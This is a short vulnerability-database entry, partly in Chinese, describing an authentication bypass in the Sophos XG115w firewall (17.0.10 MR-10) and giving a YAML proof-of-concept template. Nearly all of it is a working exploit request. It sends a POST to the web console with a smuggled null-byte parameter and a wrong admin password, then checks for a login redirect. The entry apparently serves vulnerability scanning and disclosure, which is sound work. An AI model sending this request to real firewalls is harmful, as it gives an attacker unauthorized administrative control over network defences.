sophos-xg115w-firewall-mr-10-authentication: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass

日期: 2025-09-01 | 影响软件: sophos xg115w firewall | POC: 已公开

漏洞描述

此漏洞允许攻击者通过绕过身份验证获得对防火墙管理空间的未经授权的访问。

PoC代码[已公开]

id: sophos-xg115w-firewall-mr-10-authentication
info:
  name: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass
  author: Aryan Chehreghani
  severity: high
  verified: true
  description: 此漏洞允许攻击者通过绕过身份验证获得对防火墙管理空间的未经授权的访问。
  reference:
    - https://www.exploit-db.com/exploits/51006

set:
  hosturl: request.url
rules:
  r0:
    request:
      method: POST
      path: /webconsole/Controller
      headers:
        Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103
        Accept: text/plain, */*; q=0.01
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        X-Requested-With: XMLHttpRequest
        Origin: "{{hosturl}}"
        Referer: "{{hosturl}}/webconsole/webpages/login.jsp"
        Sec-Fetch-Dest: empty
        Sec-Fetch-Mode: cors
        Sec-Fetch-Site: same-origin
        Te: trailers
      body: |
        mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066
    expression: response.status == 200 && response.body.bcontains(b'{"redirectionURL":') && response.body.bcontains(b'"/webpages/index.jsp"') && response.body.bcontains(b'"status":')
expression: r0()